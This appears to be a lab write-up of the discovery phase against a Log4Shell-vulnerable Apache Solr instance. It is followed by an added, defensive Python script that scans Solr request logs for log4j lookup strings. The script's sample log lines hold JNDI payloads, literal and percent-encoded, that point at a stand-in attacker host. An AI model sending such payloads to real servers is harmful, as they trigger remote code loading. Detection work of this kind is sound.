Discovery

This target machine is running Apache Solr 8.11.0, one example of software that is known to ship the vulnerable log4j package.

I explored the web interface accessible at http://10.10.75.171:8983 and clicked around to get a feel for the application. For more detail on Apache Solr, please refer to the official website: https://solr.apache.org/


This instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, absolutely minimal installation, yet at its core it is still vulnerable to CVE-2021-44228.

When navigating to http://10.10.75.171:8983, I could see clear indicators that log4j is in use within the application for logging activity. The -Dsolr.log.dir argument was set to /var/solr/logs.

solr logs

The path (URL endpoint) indicated in these repeated entries is /admin/cores.

I also gathered from these log entries that there are some data points I could control as a user; the params={} field gave that away.
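The observation above is exactly what a defender should act on: request parameters that a user controls are written verbatim into the Solr request log, so the log itself is where exploitation attempts against CVE-2021-44228 become visible. The following is an added detection example, not code from the original write-up or from the Solr project. It parses log lines in the shape of Solr's request log (path=... params={...}), percent-decodes the parameter string, and flags any value that contains a log4j lookup sequence (${...}). The log lines are constructed for this example; the hostnames and the 10.10.75.171 layout are placeholders, and the line format is an assumption based on the path=/admin/cores and params={} fields described in the text.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the shape of a Solr request log; not taken from the target.
SAMPLE_LOG = """\
2021-12-12 10:00:01.101 INFO  (qtp-14) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=1
2021-12-12 10:00:03.202 INFO  (qtp-15) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://attacker.invalid/x}&wt=json} status=0 QTime=2
2021-12-12 10:00:05.303 INFO  (qtp-16) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%24%7Bjndi%3Aldap%3A//attacker.invalid/x%7D&wt=json} status=0 QTime=2
2021-12-12 10:00:07.404 INFO  (main) [   ] o.a.s.c.SolrCore Solr core startup complete
"""

# Assumed line shape: "path=<endpoint> params={<query string>} status=<n>".
# Non-greedy match plus the "} status=" terminator keeps braces inside values intact.
LINE_RE = re.compile(r"path=(?P<path>\S+)\s+params=\{(?P<params>.*?)\}\s+status=")

# Any log4j lookup sequence. Legitimate Solr query parameters have no reason to
# contain "${...}", so its presence in a logged request is a strong indicator.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def parse_request_line(line: str):
    """Return {'path', 'params'} for a request-log line, or None for other lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {"path": m.group("path"), "params": m.group("params")}


def find_lookup_attempts(log_text: str):
    """Scan log text and return one record per line whose params carry a lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_request_line(line)
        if rec is None:
            continue
        # Percent-decode first so an encoded "%24%7B" is matched like a literal "${".
        decoded = unquote(rec["params"])
        match = LOOKUP_RE.search(decoded)
        if match:
            hits.append({"line": lineno, "path": rec["path"], "lookup": match.group(0)})
    return hits


if __name__ == "__main__":
    for hit in find_lookup_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['path']} carries lookup {hit['lookup']}")
```

Running the block on the constructed sample flags lines 2 and 3 (the literal and the percent-encoded lookup) and ignores the benign request and the startup line. In a real deployment the same logic belongs in the log pipeline that already ingests /var/solr/logs, with the decoded parameter string kept in the alert so an analyst can see which field was abused.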
